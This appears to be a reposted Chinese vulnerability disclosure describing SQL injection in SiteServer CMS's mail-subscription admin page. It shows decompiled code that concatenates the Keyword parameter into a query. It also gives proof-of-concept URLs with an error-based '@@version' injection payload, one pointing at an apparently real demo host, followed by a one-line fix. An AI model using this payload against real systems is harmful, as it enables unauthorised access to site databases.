来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 注入存在 siteserver cms background_mailSubscribe aspx用 NET Reflector 反编译SiteServer CMS dll这个文件查看代码如下:if (((((uint) isPostBack) - ((uint) isPostBack)) = 0) isPostBack)...
|
注入存在/siteserver/cms/background_mailSubscribe.aspx
用.NET Reflector 反编译SiteServer.CMS.dll这个文件
查看代码如下:
if (((((uint) isPostBack) - ((uint) isPostBack)) >= 0) && isPostBack)
{
this.spContents.SelectCommand = DataProvider.MailSubscribeDAO.GetSelectCommend(base.PublishmentSystemID, base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);
}
else
Keyword
public string GetSelectCommend(int publishmentSystemID, string keyword, string dateFrom, string dateTo)
{
// This item is obfuscated and can not be translated.
StringBuilder builder;
bool flag;
bool flag2;
if (publishmentSystemID != 0)
{
goto Label_02D7;
}
if ((((uint) publishmentSystemID) + ((uint) publishmentSystemID)) >= 0)
{
goto Label_0311;
}
goto Label_026E;
Label_002D:
return ("SELECT ID, PublishmentSystemID, Receiver, Mail, IPAddress, AddDate FROM siteserver_MailSubscribe " + builder.ToString());
Label_0069:
builder.AppendFormat("(AddDate <= '{0}')", dateTo);
goto Label_002D;
.....
Label_0197:
if ((((uint) flag2) + ((uint) flag)) <= uint.MaxValue)
{
goto Label_016C;
}
goto Label_0151;
Label_01B4:
if ((((uint) flag) & 0) != 0)
{
goto Label_02B6;
}
builder.AppendFormat("(Receiver LIKE '%{0}%' OR Mail LIKE '%{0}%')", keyword);
goto Label_0197;
http://www.target.com/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=
 http://2012.moban.siteserver.cn/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=
修复方案:
对那几个参数过滤
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
